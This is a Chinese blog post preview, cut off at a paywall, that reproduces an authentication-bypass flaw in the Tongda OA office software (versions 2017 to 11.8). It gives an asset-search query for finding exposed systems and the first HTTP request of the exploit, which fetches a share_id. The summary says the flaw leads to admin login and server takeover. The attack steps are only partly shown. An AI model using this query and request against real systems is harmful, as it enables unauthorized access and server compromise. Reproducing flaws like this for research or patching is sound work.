超级会员免费看
本文介绍了通达OA协同办公软件的share身份认证绕过漏洞,详细阐述了漏洞影响的版本,包括2017版和11.8版。通过资产测绘和漏洞复现步骤,解释了如何构造恶意代码获取share_id,并利用它来实现任意用户登录,甚至可能控制服务器。
一、漏洞简介
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA /share/handle.php存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
二、影响版本
● 通达OA2017-通达OA11.8
三、资产测绘
● hunter:app.name="通达 OA"
● 登录页面
四、漏洞复现
- 获取share_id
GET /share/handle.php?module=2&module_id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
订阅专栏 解锁全文
扫一扫
851
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
